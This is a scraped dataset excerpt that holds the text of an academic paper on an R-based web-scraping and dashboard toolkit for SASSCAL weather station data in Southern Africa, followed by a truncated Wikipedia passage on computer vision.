356 | https://en.wikipedia.org/wiki/Data_scraping | https://doi.org/10.5334%2Fdsj-2021-024 | The Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated to support regional weather monitoring and climate research in Southern Africa. As a result, several Automatic Weather Stations (AWSs) were implemented to provide numerical weather data within the collaborating countries. Meanwhile, access to the SASSCAL weather data is limited to a number of records that are achieved via a series of clicks. Currently, end users can not efficaciously extract the desired weather values. Thus, the data is not fully utilised by end users. This work contributes with an open source Web Scraping Application Programming Interface (WebSAPI) through an interactive dashboard. The objective is to extend functionalities of the SASSCAL Weathernet for: data extraction, statistical data analysis and visualisation. The SASSCAL WebSAPI was developed using the R statistical environment. It deploys web scraping and data wrangling techniques to support access to SASSCAL weather data. This WebSAPI reduces the risk of human error, and the researcher’s effort of generating desired data sets. The proposed framework for the SASSCAL WebSAPI can be modified for other weather data banks while taking into consideration the legality and ethics of the toolkit. Meteorological weather data are useful in filling information needs in academia and industrial settings. The information generated from these data at local levels is useful in complementing: hydrological models (Schuol Abbaspour 2007), high impact weather predictions models (Chang et al. 2013), and simulations of heavy rainfall events (Bopape et al. 2021, Molongwane et al. 2020, Somses et al. 2020) and heatwaves (Moses 2017). Moreover, weather data are also vital for agro-meteorological operations, as well as in efficacious planning of construction and recreational activities. Although there is a huge need of weather or climatological data for Southern Africa, various institutions and enterprises like BIUST, SASSCAL1 and WASCAL2 have introduced AWSs to monitor weather events at finer intervals. However, most of AWSs installed in developing countries are underutilized. For instance, the Botswana Department of Meteorological Services (BDMS)’s mandate is to provide quality weather, climate information and services to enable informed decision making for sustainable socio-economic development in scenarios related to weather and climate. Meanwhile, the BDMS lacks a designated online platform (currently relies on radio stations, television and a Facebook page) to disseminate weather information to the public. On a related note, BIUST identified “Climate and Society” as one of its thematic areas3 of focus. This is geared towards enhancing services related to: climate and impact modeling; early warning, and disaster management for weather and climate change. In 2016, BIUST installed an AWS equipped with a local machine running XConnect for data logging of historical weather data. Likewise, this particular AWS also lacks the backend service layer for dissemination of weather outputs to end users. All these can be seen as barriers and hence limitations of access to the generated weather data. For instance, to request data, clients have to go through some hectic processes. In the case of BIUST, clients have to request data using email, or copy it from the officers using physical storage devices like memory cards. In case of BDMS, end users download and complete a form;4 then submit it to BDMS. The service time is three days long. It is irrefutable that, the demand of climatological data in Southern Africa invites key stake holders (i.e., researchers and developers) and organisations to implement platforms that facilitate ease access and visualisation of climate data. As a result, the Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated (Helmschrot, J rg and Muche, GERHARD and Hillmann, THOMAS and Kanyanga, JOSEPH and Butale, MOMPATI and Nascimento, DOMINGOS and Kruger, SALOME and Strohbach, B and Seely, MARY and Ribeiro, CARLOS and others 2015) to support regional weather monitoring and climate research in Southern Africa (Muche, Gerhard and Kruger, Salome and Hillmann, Thomas and Josenhans, Katrin and Ribeiro, Carlos and Bazibi, Mompati and Seely, Mary and Nkonde, Edson and de Clercq, Willem and Strohbach, Ben and others 2018). The SASSCAL Weathernet5 disseminates near to real-time data from AWSs at hourly intervals, including aggregated daily and monthly data (see Figure 1). Visualisation of AWS data via the SASSCAL Weathernet. The SASSCAL weather data is reviewed for quality control before dissemination (Kaspar et al. 2015). These data can also be integrated with data from different sources for research purposes. For instance, Moses et. al. (Oliver L 2018) merged it with other meteorological data from the BDMS to analyse effects of solar radiation, wind speed and humidity on evapo-transpiration around the Okavango Delta. Similarly, predictive data analysis and modeling of temperature patterns (Thapelo 2014, Thapelo Jamisola 2019) is vital in the understanding of heatwaves (Moses 2017); while rainfall values can help in assessing rainfall erosivity (Singh Singh 2020). Despite the distinct potential use of the SASSCAL weather data, there is a burden on the end users to access, download and use such data in research (see Figure 2). First, the user has to navigate to the SASSCAL Weathernet to identify a country, AWS of interest, and the temporal resolution of the weather data. The user can then manually copy and paste the whole data to a storage file for data analysis. There is an option to download the SASSCAL weather data in excel format only. However, there is no option to only select the desired weather values from AWSs of interest. Even after downloading the weather data, end users face a challenge of generating clean data sets containing the desired variables for further use. The situation worsens when extracting finer temporal data from multiple AWSs across the entire region. Manually extracting data from the SASSCAL Weathernet. This process is costly, time consuming and error-prone. This work presents the SASSCAL Web Scraping Application Programming Interface (WebSAPI). Web scraping (Munzert et al. 2014) is a data science technique that deploys scripts for extraction of structured data from websites. A script is a computer program that automates a specific task using some selected programming languages like R or Python. Thus, a WebSAPI can be seen as an application service that allows access to online data for further use in research projects. By digitalising the BDMS’ form in 4 for climate data requests, this work will be enabling end users to efficaciously (1) access and visualise weather data from the SASSCAL Weathernet; and (2) download desired data for use in data driven projects. The structure of the work is as follows. Section II provides a brief background information to this work. Section III presents the approach deployed in the development of the SASSCAL WebSAPI. Section IV presents results. It also illustrates how the SASSCAL WebSAPI can be used to support the extraction of weather variables, as well as the visualisation and dissemination of the generated outputs. Lastly, section V and VI present discussions and conclusions. Most of African countries (Tufa et al. 2014) like Botswana (Nkemelang et al. 2018) are lagged behind in terms of climate informatics (Vyacheslav et al. 2019) and environmental data science (Gibert et al. 2018, Vyacheslav et al. 2019). This can be attributed to lack of readily available platforms and data as also pointed out in (Schuol Abbaspour 2007, Tufa et al. 2014). All these bottlenecks can be unlocked by integrating computing technologies like web scraping and dashboard applications. Web scraping techniques have been widely deployed in a number of projects from different disciplines such as economics (Robert Paul 2020) and climate science (Yang et al. 2010). Regardless of the discipline, the general idea is to allow greater visibility, access, extraction and usability of the online data. This work contributes by addressing the second “pillar” of the Global Framework for Climate Services (Vaughan et al. 2016) using climate informatics. This WebSAPI is motivated by authors in (Bonifacio et al. 2015) who presented a free tool for automated extraction and consolidation of climate data from different online web data banks. A similar work by Yang et al. (Yang et al. 2010) presented a system with functionalities for scraping, filtering and visualising climatic data for easy use. This work is related to Ref (Sitterson et al. 2020) regarding the user API for data request. It is also related to (Bonifacio et al. 2015) in such it deconstructs the URL for a given station and then modifies the date range and the desired temporal resolution to extract desired weather data. Web scraping is still emerging, with no dominant standards at current. This technology also presents a combination of ethical and legal challenges (Krotov Vlad and Johnson Leigh and Silva Leiser 2020, Mason 1986) that necessitates standards to support data exchange. The ethical issues attached to web scraping can be summed into four generic groups: property, privacy, accessibility and accuracy (Mason 1986). Web scrappers can also compete with the main data provider APIs, which might diminish the value of the organisation’s intended mission (Hirschey 2014). For instance, if a web scrapper attracts more clients than the intended main API, then end users might end up neglecting the platform of that organisation. All these invite multi-disciplinary collaboration (i.e., government sectors, academia and industrial practitioners) to establish standards and boundaries for technology usage. This could irrefutably catalyse the development and adoption of the generated data driven outputs as also supported in (Fundel et al. 2019, Katz Murphy 2005). The first task was to identify the data sources, and the SASSCAL Weathernet came to the rescue. The aim of the SASSCAL WebSAPI is to improve data accessibility and visualisation of the SASSCAL Weather data before data analysis and predictive modeling. The target of this work was to develop and implement independent algorithms that can, later on, be consolidated and integrated into a package for data driven projects requiring SASSCAL weather data. The SASSCAL WebSAPI comprises of modularised algorithms packaged into scripts to enable direct control of weather data provided by the SASSCAL weathernet. This include but not limited to algorithms targeted at: processing the SASSCAL Weathernet link; determining the pages containing relevant weather data; deconstructing and parsing contents of the HTML file; extracting required weather data from selected pages; combining data (i.e., data wrangling) into data frames to generate data sets and visuals; as well as sharing the generated outputs using interactive dashboards. The SASSCAL Weathernet enables the public to use one domain to access the AWS data. Each SASSCAL country member has various AWSs, each with a unique identifier (ID). Access to the data is defined using the same abstract pattern. In essence, one can query the website’s database for any AWS within the SASSCAL region by providing the corresponding URL. Thus, one can extract the weather data via a tailored API using formats like HTML and XML. The home page URL for each SASSCAL AWS data is defined by: x y?z; where x is the preamble in link 5; y is just the weatherstat AO we.php token that defines the weather statistics for a given resolution (monthly, daily or hourly); and z is the string describing the logger ID (loggerid crit n), where n is the AWS’ unique ID. Tables containing relevant data are found by trial and error (i.e., by inspect individual elements of the SASSCAL weathernet page), or just exploring the source code of the web page. This work deploys the workflow depicted in Figure 3 following the data science approach in (Bradley James 2019, Hadley Garrett 2016) using open-source platforms (i.e., R version 4.0.3 and RStudio 1.1.463). Thus, the algorithms are coded in R, and the functions are tested using the RMarkdown which facilitates reproducibility. R has excellent packages for statistical data science and visualisation. Table 1 shows packages deployed in this work. Workflow of the SASSCAL WebSAPI. Table 1 R packages proposed in this work. A helper function (helper.R) is scripted to install and load the packages included in Table 1. The rvest (Wickham Wickham 2016) package is required for web scraping; while the XML (Lang Lang 2015) is required for XML document processing. The ggplot2 (Wickham 2011) is used for data visualisation. The Shiny (Chang et al. 2015) and Flexdashboard (Allaire 2017) packages are used to design the WebSAPI’s dashboard. The htmlwidgets framework is deployed to provide high-level R bindings to the JavaScript libraries for data visualization. All these functions are embedded in a reproducible RMarkdown to implement the proposed SASSCAL WebSAPI. The data driven pipeline used in this work is summarised in Figure 3. Algorithm 1 implements an interactive map to visualise where the AWSs are located geographically. Here, w is a vector of AWSs for a given country, x and y are vectors of the latitude and longitude coordinates of the AWSs, z is a vector detailing the descriptions of a given AWS. The algorithm also allows users to select specific AWSs; thanks to the leaflet package. In Algorithm 1, the dataframe c’ defining the inputs is piped into the leaflet function to automatically generate an auto-size map that fits markers of all AWSs. This function also adds some bounds in (Line 4) so that the user can’t scroll too far away from the markers of AWSs. The interactive map pops up the name of the AWS as the user hovers the mouse over a marker. This simple functionality is crucial for end users (i.e., researchers) since it provides spatio-visual exploration of AWSs that are supported by the SASSCAL weathernet. Algorithm 1 Visualise the AWSs of a given country. The web scraping functionality in Algorithm 2 uses the All AWS ID.R script to construct vectors and store names and IDs of AWSs. The AWS ID Getter function assigns an AWS name (i.e., “x”) to its corresponding ID (i.e., “value”) using a hash map function (see Line 7 and 8). Thus, to find the ID for a given AWS of interest, the function looks-it-up into the hash function and retrieves the address of that AWS’ ID. Algorithm 2 Data scraper. The AWS name, ID and date are then used to construct a URL used to fetch the data by the DataHaverster.R function in Algorithm 3. The DataHarveter takes in a URL to a given AWS. The URL string can be partitioned into tokens (i.e., using just the AWS name and date) to facilitate easy input. Algorithm 3 Data harvesting. The XML package (Lang Lang 2013) was used to parse a given URL and create a Document Object Model (DOM). This XML package uses the readHTMLTable() function to specify the weather data to select from the HTML tables in the SASSCAL Weathernet. The number of tables for a given DOM was determined using R’s built-in length() function. There are three DOM instances for each temporal resolution; each with multiple tables. There are 14 tables in the DOM corresponding to the web page with hourly data, and the values of interest are in the 13th table. The DOM for the web page with daily observations has 13 tables, and daily values of interest are in the 12th table. The last DOM has 18 tables with monthly data contained in the 10th table. Line 3 in Algorithm 3 facilitates the cleaning and selection of desired weather tables using the parameter (i.e., can be 13, 12 or 10 as discussed above). The parameter defines the extensions to fix the columns of a table to be visualised; while defines extra options for buttons to facilitate end users to search, scroll, copy and download the weather data visualised via the table. The DataWrangler() function was implemented to iterate through the table containing dates of observations. It uses the argument to determine the date range for the data of interest. The extracted weather data is then unified into a single data frame to generate data sets for further use as illustrated in Figures 4 and 5 in section IV. Visualising Botswana AWS using Algorithm 1. Screenshot of the SASSCAL WebSAPI for capturing user input when requesting weather data. The GUI allows end users to select the geographical location of interest (i.e., Botswana), temporal resolution, the AWS of interest and the downloading of data. The functionality of multi-input selection of AWSs provides end users with a feedback mechanisms to notify about the selected AWS as seen on the tab titled “Currently Selected AWS. This is quite useful for a quick exploration of geographic locations before downloading data. Algorithm 4 implements functionalities for the dashboard page. This include the dashboardHeader() to define the title; and the dashboardSidebar() to define two functionalities of visualising the tables of numerical weather data from an AWS of a given country. The dashboardBody() facilitates selection of the AWS, the resolution, date range, use of data, and weather values and the functionality to also export data. Since different end users have different user needs, this work does not develop a complete GUI. Interested readers should see Ref (Robert Paul 2020) for completing a dashboard API. Algorithm 4 Dashboard design for dissemination. This work documents the development process of a lightweight WebSAPI capable of extracting and displaying timely weather data based on the SASSCAL weathernet. The WebSAPI is cost-effective since it is powered by open source technologies. Besides the functionalities of extracting numerical data, the WebSAPI’s tasks were expanded to include visuals using other formats like tables, maps, and charts. Figure 4 shows an interactive map generated using Algorithm 1. The interactive map can pop-up the name of the AWS as the user hovers the mouse over a marker. The algorithms defined in section III-E only scrape data from one AWS at a time. These can be extend by adding a functionality to specify multiple AWSs then use a for loop function to scrape desired weather data as shown in Figure 6. Screenshot of the SASSCAL WebSAPI’s GUI for data request, visualisation and extraction of data. In addition to selecting the desired AWS, temporal resolution, and the date range, the SASSCAL WebSAPI’s GUI allows end users to select the desired variables. In this work, a data driven template was developed in the form of a WebSAPI to facilitate efficacious interaction with the outputs generated by the SASSCAL weathernet. The SASSCAL WebSAPI implements modularised algorithms to collect the SASSCAL weather data and generate high-quality data sets that can be used in data driven projects. Modularised scripts facilitate an efficient product design process that integrates any efforts related to idea generation, concept development, and, modification of existing systems and platforms to develop proper solutions. This section presents discussions regarding the data quality, legal aspects, limitations and implications of the proposed WebSAPI. The SASSCAL Weathernet data is checked for quality control as mentioned in Ref (Kaspar et al. 2015). This gives an “assurance” that the SASSCAL WebSAPI will provide quality data that would not mislead end users (i.e, researchers, or decision makers). However, users should note that due to occasional sensor faults, the correctness of data values cannot be fully guaranteed as also indicated in the SASSCAL Weathernet.6 The declaration on SASSCAL data use indicates that free use is granted for non-commercial and educational purposes. Although there are no explicit restrictions on data scraping on the SASSCAL Weathernet, it is difficult to conclude that SASSCAL encourages end users to automatically scrape and extract data using tailor made APIs. This can be justified by the note “For data requests regarding specific countries, stations, time periods or specific sensors please contact oadc-datarequest sasscal.org” as shown in.7 It should be noted that the underlined aspects are the challenges proposed to be addressed through this work. Thus, personal APIs that pro-grammatically extract the weather data by bypassing the designated SASSCAL Weathernet API can be seen as presenting slight ethical dilemma for developers. The main hurdle relates to identifying and integrating appropriate data driven technologies to facilitate flexible access and visualisation of the SASSCAL weather data. In this regard, a couple of algorithms have been completed and tested to optimise the task of web scraping. However, the taks of retrieving weather data was tested using relatively small dataset (94 instances). The small data set were chosen to ensure that the automatic scraping and retrieving of data does not likely damage or slow down the SASSCAL website’s servers. This toolkit is built on top of the SASSCAL Weathernet. Thus, changes in structural representation of SASSCAL Weathernet implies modifying the WebSAPI. There is no free lunch in problem solution. The process of web scraping and dashboard design is iterative and evolutionary. The integration of R, flexdashboard and Shiny allows the development and deployment of interactive apps. However, before starting a web scraping based data driven project, developers should start by analysing associated legality and ethics (Krotov Vlad and Johnson Leigh and Silva Leiser 2020, Mason 1986) to avoid possible bottlenecks. The contribution of this work is rather pragmatic than theoratical. The WebSAPI is flexible and reproducible, with potential to be scaled up (expanded) to address other functionalities related to the use of SASSCAL weather data. Reproducibility is an important aspect in open science research and API development. This helps to reduce time taken for data collection, development and testing since the independent components (algorithms) have been already tried and tested. This approach has potential to catalyse the development of packages from existing platforms to meet the end user requirements. It should be noted that neither the BDMS nor BIUST have an API to disseminate weather information. This WebSAPI is still under development, yet with potential to be adapted and incorporated to portals of weather service providers (BIUST, BDMS, SASSCAL, and WASCAL) to bridge gaps of weather and climate data access. Developing and implementing a data driven platform to serve end users is a challenging task that requires input from multidisciplinary stake holders. This work integrated web scraping (Munzert et al. 2014), data wrangling and dashboard techniques to develop a lightweight SASSCAL WebSAPI. In comparison to previous web scraping literature, this work takes into consideration that data driven outputs need to be disseminated to end users. In this case, a dashboard proto-type was developed in RMarkdown to facilitate reproducibility. The WebSAPI is expected to create new channels to extend services of the SASSCAL Weathernet. By enabling efficacious and efficient data access, the SASSCAL WebSAPI has potential to increase productivity and quality of data driven projects that make use of SASSCAL weather data. The SASSCAL WebSAPI should be seen not as a replacement but rather a complementary toolkit to the SASSCAL Weathernet. It does not cover all the tasks related to “weather data science”, but it provides the end-user community with the opportunity to reproduce it and develop in-depth product development skills to ultimately add more functionalities to a related API. In terms of extending this work, more end-user driven functionalities will be added to this API to enable data driven operations and services like investigating strategies for imputation of missing data, and modelling. The collaboration with the concerned stakeholders (i.e, SASSCAL, BDMS, BIUST), including end users (researchers, students, and farmers) could catalyse the development and deployment process. This will surely enhance operational productivity while maximizing utilization of these amazing open-source technologies. Efforts from this work are likely to spawn new projects and collaboration that will better inform citizens and continue to help them to make use of the generated data, and contribute to the open-data community. This R based toolkit is still under development. Parallel to this manuscript is a reproducible tutorial in RMarkdown, integrating Shiny and Flexdashboard for visualisation and dissemination of outputs. The tutorial and code is available on https: github.com EL-Grande SASSACL-WebSAPI and the data is available online 5. https: www.sasscal.org . https: wascal.org . www.biust.ac.bw research thematic-areas-platforms . https: www.gov.bw natural-resources request-climatological-data. http: www.sasscalWeathernet.org . http: www.sasscalWeathernet.org imprint we.php. http: www.sasscalWeathernet.org contact we.php. BIUST: for the partial financial support (with reference number: S 00086); and SASSCAL for availing the data. The authors have no competing interests to declare. Thapelo TS: Conceptualization, Methodology, Resources, Application Development, Writing (Original Draft Preparation; Review and Editing); Namoshe M: Conceptualization, Resources, Formal Analysis, Review and Editing; Matsebe O: Conceptualization, Resources, Formal Analysis, Review and Editing; Motshegwa T: Resources, Formal Analysis, Review and Editing; Bopape MJM: Resources, Formal Analysis, Review and Editing. Allaire, J. 2017. Flexdashboard: R markdown format for flexible dashboards. Bonifacio, C, Barchyn, TE, Hugenholtz, CH and Kienzle, SW. 2015. CCDST: A free Canadian climate data scraping tool. Computers Geosciences, 75: 13 16. DOI: https: doi.org 10.1016 j.cageo.2014.10.010 Bopape, M-JM, Waitolo, D, Plant, RS, Phaduli, E, Nkonde, E, Simfukwe, H, Mkandawire, S, Rakate, E and Maisha, R. 2021. Sensitivity of Simulations of Zambian Heavy Rainfall Events to the Atmospheric Boundary Layer Schemes. Climate, 9(2): 38. DOI: https: doi.org 10.3390 cli9020038 Bradley, A and James, RJ. 2019. Web scraping using R. Advances in Methods and Practices in Psychological Science, 2(3): 264 270. DOI: https: doi.org 10.1177 2515245919859535 Chang, EK, Pe a, M and Toth, Z. 2013. International research collaboration in high-impact weather prediction. Bulletin of the American Meteorological Society, 94(11): ES149 ES151. DOI: https: doi.org 10.1175 BAMS-D 13 00057.1 Chang, W, Cheng, J, Allaire, J, Xie, Y and McPherson, J. 2015. Package shiny’. See http: citeseerx.ist.psu.edu viewdoc download. Dowle, M, Srinivasan, A, Gorecki, J, Chirico, M, Stetsenko, P, Short, T, Lianoglou, S, Antonyan, E, Bonsch, M, Parsonage, H, et al. 2019. Package data. table’. Extension of data.frame’. Dreyer, A and Stockton, J. 2013. Internet “data scraping”: A primer for counseling clients. New York Law Journal, 7: 1 3. Fundel, VJ, Fleischhut, N, Herzog, SM, G ber, M and Hagedorn, R. 2019. Promoting the use of probabilistic weather forecasts through a dialogue between scientists, developers and end-users. Quarterly Journal of the Royal Meteorological Society, 145: 210 231. DOI: https: doi.org 10.1002 qj.3482 Gibert, K, Izquierdo, J, S nchez-Marr , M, Hamilton, SH, Rodr guez-Roda, I and Holmes, G. 2018. Which method to use? An assessment of data mining methods in Environmental Data Science. Environmental Modelling Software, 110: 3 27. Special Issue on Environmental Data Science. Applications to Air quality and Water cycle. 2. DOI: https: doi.org 10.1016 j.envsoft.2018.09.021 Graul, C and Graul, MC. 2016. Package leafletr”. Hadley, W and Garrett, G. 2016. R for data science: import, tidy, transform, visualize, and model data. O’Reilly Media, Inc. Helmschrot, J, Muche, G, Hillmann, T, Kanyanga, J, Butale, M, Nascimento, D, Kruger, S, Strohbach, B, Seely, M, Ribeiro, C, others. 2015. SASSCAL WeatherNet to support regional weather monitoring and climate-related research in Southern Africa. Proceedings of the International Association of Hydrological Sciences, 366: 170 171. DOI: https: doi.org 10.5194 piahs 366 170 2015 Hirschey, JK. 2014. Symbiotic relationships: Pragmatic acceptance of data scraping. Berkeley Tech. LJ, 29: 897. DOI: https: doi.org 10.2139 ssrn.2419167 Ives, B and Krotov, V. 2006. Anything you search can be used against you in a court of law: Data mining in search archives. Communications of the Association for Information Systems, 18(1): 29. DOI: https: doi.org 10.17705 1CAIS.01829 Kaspar, F, Helmschrot, J, Mhanda, A, Butale, M, de Clercq, W, Kanyanga, J, Neto, F, Kruger, S, Castro Matsheka, M, Muche, G, et al. 2015. The SASSCAL contribution to climate observation, climate data management and data rescue in Southern Africa. Advances in science and research, 12: 171 177. DOI: https: doi.org 10.5194 asr 12 171 2015 Katz, RW and Murphy, AH. 2005. Economic value of weather and climate forecasts. Cambridge University Press. Krotov, V, Leigh, J and Leiser, S. 2020. Tutorial: Legality and Ethics of Web Scraping. Communications of the Association for Information Systems, 47(1): 22. DOI: https: doi.org 10.17705 1CAIS.04724 Lang, DT and Lang, MDT. 2013. Package xml’. Lang, DT and Lang, MDT. 2015. Package XML’. DOI: https: doi.org 10.2307 248873 Mason, RO. 1986. Four ethical issues of the information age. MIS quarterly, 5 12. DOI: https: doi.org 10.2307 248873 Molongwane, C, Bopape, M-JM, Fridlind, A, Motshegwa, T, Matsui, T, Phaduli, E, Sehurutshi, B and Maisha, R. 2020. Sensitivity of Botswana Ex-Tropical Cyclone Dineo rainfall simulations to cloud microphysics scheme. AAS Open Research, 3(30): 30. DOI: https: doi.org 10.12688 aasopenres.13062.1 Moses, O. 2017. Heat wave characteristics in the context of climate change over past 50 years in Botswana. Botswana Notes and Records; ub.bw index.php bnr . Muche, G, Kruger, S, Hillmann, T, Josenhans, K, Ribeiro, C, Bazibi, M, Seely, M, Nkonde, E, de Clercq, W, Strohbach, B, others. 2018. SASSCAL WeatherNet: present state, challenges, and achievements of the regional climatic observation network and database. Biodiversity Ecology, 6: 34 43. DOI: https: doi.org 10.7809 b-e.00302 Munzert, S, Rubba, C, Meissner, P and Nyhuis, D. 2014. Automated data collection with R: A practical guide to web scraping and text mining. John Wiley Sons. DOI: https: doi.org 10.1002 9781118834732 Nkemelang, T, New, M and Zaroug, M. 2018. Temperature and precipitation extremes under current, 1.5 C and 2.0 C global warming above pre-industrial levels over Botswana, and implications for climate change vulnerability. Environmental Research Letters, 13(6): 065016. DOI: https: doi.org 10.1088 1748 9326 aac2f8 Oliver, M and Hambira, WL. 2018. Effects of climate change on evapotranspiration over the Okavango Delta water resources. Physics and Chemistry of the Earth, Parts A B C, 105: 98 103. DOI: https: doi.org 10.1016 j.pce.2018.03.011 Robert, S and Paul, S. 2020. Making health economic models Shiny: A tutorial. Wellcome Open Research, 5(69): 69. DOI: https: doi.org 10.12688 wellcomeopenres.15807.2 Schuol, J and Abbaspour, K. 2007. Using monthly weather statistics to generate daily data in a SWAT model application to West Africa. Ecological modeling, 201(3 4): 301 311. DOI: https: doi.org 10.1016 j.ecolmodel.2006.09.028 Singh, J and Singh, O. 2020. Assessing rainfall erosivity and erosivity density over a western Himalayan catchment, India. Journal of Earth System Science, 129(1): 1 22. 2. DOI: https: doi.org 10.1007 s12040 020 1362 8 Sitterson, J, Sinnathamby, S, Parmar, R, Koblich, J, Wolfe, K and Knightes, CD. 2020. Demonstration of an online web services tool incorporating automatic retrieval and comparison of precipitation data. Environmental Modelling Software, 123: 104570. DOI: https: doi.org 10.1016 j.envsoft.2019.104570 Somses, S, Bopape, M-JM, Ndarana, T, Fridlind, A, Matsui, T, Phaduli, E, Limbo, A, Maikhudumu, S, Maisha, R and Rakate, E. 2020. Convection Parametrization and Multi-Nesting Dependence of a Heavy Rainfall Event over Namibia with Weather Research and Forecasting (WRF) Model. Climate, 8(10): 112. DOI: https: doi.org 10.3390 cli8100112 Thapelo, ST. 2014. T cnicas de aprendizaje automatizado para el pron stico de temperaturas min mas en el Centro Meteorol gico de Villa Clara, Santa Clara, PhD thesis, Universidad Central “Marta Abreu” de Las Villas. Thapelo, TS and Jamisola, RS. 2019. Machine learning for maximum and minimum temperature analytics and prediction at local level. Tufa, D, Paul, B, Jessica, S, Kinfe, H, Daniel, O, del Corral, J, Cousin, R and Thomson, MC. 2014. Bridging critical gaps in climate services and applications in Africa. Earth Perspectives, 1(1): 15. DOI: https: doi.org 10.1186 2194 6434 1 15 Vanderkam, D, Allaire, J, Owen, J, Gromer, D, Shevtsov, P and Thieurmel, B. 2015. dygraphs: Interface to’Dygraphs’ Interactive Time Series Charting Library. R package version 0.5. Vyacheslav, L, Andrew, R and Samuel, S. 2019. Statistics for climate informatics. Environmetrics, 30(4). DOI: https: doi.org 10.1002 env.2567 Wickham, H. 2011. ggplot2. Wiley Interdisciplinary Reviews: Computational Statistics, 3(2): 180 185. Wickham, H and Wickham, MH. 2016. Package rvest’. URL: https: cran.r-project.org web packages rvest rvest.pdf. DOI: https: doi.org 10.1002 wics.147 Wickham, H and Wickham, MH. 2019. Package stringr’. Yang, Y, Wilson, L and Wang, J. 2010. Development of an automated climatic data scraping, filtering and display system. Computers and Electronics in Agriculture, 71(1): 77 87. DOI: https: doi.org 10.1016 j.compag.2009.12.006 |
357 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_vision | Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images,and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g. in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input to the retina in the human analog) into descriptions of the world that make sense to thought processes and can elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. The scientific discipline of computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, multi-dimensional data from a 3D scanner, 3D point clouds from LiDaR sensors, or medical scanning devices. The technological discipline of computer vision seeks to apply its theories and models to the construction of computer vision systems. Sub-domains of computer vision include scene reconstruction, object detection, event detection, activity recognition, video tracking, object recognition, 3D pose estimation, learning, indexing, motion estimation, visual servoing, 3D scene modeling, and image restoration. Adopting computer vision technology might be painstaking for organizations as there is no single-point solution for it. Very few companies provide a unified and distributed platform or Operating System where computer vision applications can be easily deployed and managed. Computer vision is an interdisciplinary field that deals with how computers can be made to gain high-level understanding from digital images or videos. From the perspective of engineering, it seeks to automate tasks that the human visual system can do. 5 6 7 "Computer vision is concerned with the automatic extraction, analysis, and understanding of useful information from a single image or a sequence of images. It involves the development of a theoretical and algorithmic basis to achieve automatic visual understanding. 8 As a scientific discipline, computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, or multi-dimensional data from a medical scanner. 9 As a technological discipline, computer vision seeks to apply its theories and models for the construction of computer vision systems. Machine vision refers to a systems engineering discipline, especially in the context of factory automation. In more recent times, the terms computer vision and machine vision have converged to a greater degree. 10 : 13 In the late 1960s, computer vision began at universities that were pioneering artificial intelligence. It was meant to mimic the human visual system as a stepping stone to endowing robots with intelligent behavior. 11 In 1966, it was believed that this could be achieved through an undergraduate summer project, 12 by attaching a camera to a computer and having it "describe what it saw". 13 14 What distinguished computer vision from the prevalent field of digital image processing at that time was a desire to extract three-dimensional structure from images with the goal of achieving full scene understanding. Studies in the 1970s formed the early foundations for many of the computer vision algorithms that exist today, including extraction of edges from images, labeling of lines, non-polyhedral and polyhedral modeling, representation of objects as interconnections of smaller structures, optical flow, and motion estimation. 11 The next decade saw studies based on more rigorous mathematical analysis and quantitative aspects of computer vision. These include the concept of scale-space, the inference of shape from various cues such as shading, texture and focus, and contour models known as snakes. Researchers also realized that many of these mathematical concepts could be treated within the same optimization framework as regularization and Markov random fields. 15 By the 1990s, some of the previous research topics became more active than others. Research in projective 3 D reconstructions led to better understanding of camera calibration. With the advent of optimization methods for camera calibration, it was realized that a lot of the ideas were already explored in bundle adjustment theory from the field of photogrammetry. This led to methods for sparse 3 D reconstructions of scenes from multiple images. Progress was made on the dense stereo correspondence problem and further multi-view stereo techniques. At the same time, variations of graph cut were used to solve image segmentation. This decade also marked the first time statistical learning techniques were used in practice to recognize faces in images (see Eigenface). Toward the end of the 1990s, a significant change came about with the increased interaction between the fields of computer graphics and computer vision. This included image-based rendering, image morphing, view interpolation, panoramic image stitching and early light-field rendering. 11 Recent work has seen the resurgence of feature-based methods used in conjunction with machine learning techniques and complex optimization frameworks. 16 17 The advancement of Deep Learning techniques has brought further life to the field of computer vision. The accuracy of deep learning algorithms on several benchmark computer vision data sets for tasks ranging from classification, 18 segmentation and optical flow has surpassed prior methods. citation needed 19 Solid-state physics is another field that is closely related to computer vision. Most computer vision systems rely on image sensors, which detect electromagnetic radiation, which is typically in the form of either visible, infrared or ultraviolet light. The sensors are designed using quantum physics. The process by which light interacts with surfaces is explained using physics. Physics explains the behavior of optics which are a core part of most imaging systems. Sophisticated image sensors even require quantum mechanics to provide a complete understanding of the image formation process. 11 Also, various measurement problems in physics can be addressed using computer vision, for example, motion in fluids. Neurobiology has greatly influenced the development of computer vision algorithms. Over the last century, there has been an extensive study of eyes, neurons, and brain structures devoted to the processing of visual stimuli in both humans and various animals. This has led to a coarse yet convoluted description of how natural vision systems operate in order to solve certain vision-related tasks. These results have led to a sub-field within computer vision where artificial systems are designed to mimic the processing and behavior of biological systems at different levels of complexity. Also, some of the learning-based methods developed within computer vision (e.g. neural net and deep learning based image and feature analysis and classification) have their background in neurobiology. The Neocognitron, a neural network developed in the 1970s by Kunihiko Fukushima, is an early example of computer vision taking direct inspiration from neurobiology, specifically the primary visual cortex. Some strands of computer vision research are closely related to the study of biological vision—indeed, just as many strands of AI research are closely tied with research into human intelligence and the use of stored knowledge to interpret, integrate, and utilize visual information. The field of biological vision studies and models the physiological processes behind visual perception in humans and other animals. Computer vision, on the other hand, develops and describes the algorithms implemented in software and hardware behind artificial vision systems. An interdisciplinary exchange between biological and computer vision has proven fruitful for both fields. 21 Yet another field related to computer vision is signal processing. Many methods for processing one-variable signals, typically temporal signals, can be extended in a natural way to the processing of two-variable signals or multi-variable signals in computer vision. However, because of the specific nature of images, there are many methods developed within computer vision that have no counterpart in the processing of one-variable signals. Together with the multi-dimensionality of the signal, this defines a subfield in signal processing as a part of computer vision. Robot navigation sometimes deals with autonomous path planning or deliberation for robotic systems to navigate through an environment. 22 A detailed understanding of these environments is required to navigate through them. Information about the environment could be provided by a computer vision system, acting as a vision sensor 